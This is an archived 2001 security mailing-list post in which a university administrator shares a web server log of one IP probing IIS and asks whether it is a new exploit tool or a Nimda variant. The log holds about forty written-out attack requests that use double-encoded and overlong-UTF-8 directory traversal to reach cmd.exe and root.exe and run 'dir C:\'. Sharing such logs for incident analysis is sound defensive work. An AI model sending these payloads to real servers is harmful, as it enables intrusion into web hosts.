New IIS exploit tool? Has anyone seen this pattern before?

From: Thomas Haeberlen (Haeberlenat_private-Stuttgart.DE)
Date: Tue Oct 30 2001 - 03:47:00 PST

  • Next message: CT: "Re: New IIS exploit tool? Has anyone seen this pattern before?"

    Hello everybody,
    
    has anyone seen this pattern of IIS attacks before? Could this be a new
    exploit tool or something like "nimda2"? On the other hand it seems that 
    it is only trying the long known holes...
    
    ------------------------------- snip ----------------------------------
    
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/root.exe?/c+dir+C:\ HTTP/1.0" 404 210 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 254 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 403 258 "-" "-"
    195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 256 "-" "-"
    ------------------------------------ snap --------------------------------
    
    Timestamps are GMT+1. Any hints?
    
    egards,
    
    Thomas Haeberlen
    
    -- 
    Thomas Haeberlen
    Rechenzentrum Universitaet Stuttgart (RUS)              
    Abteilung Informationsdienste  
    Allmandring 30 , D-70569 Stuttgart
    Email: haeberlenat_private-stuttgart.de
    Phone: +49 711 685 47 19 Fax: +49 711 678 76 26
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Oct 30 2001 - 07:23:36 PST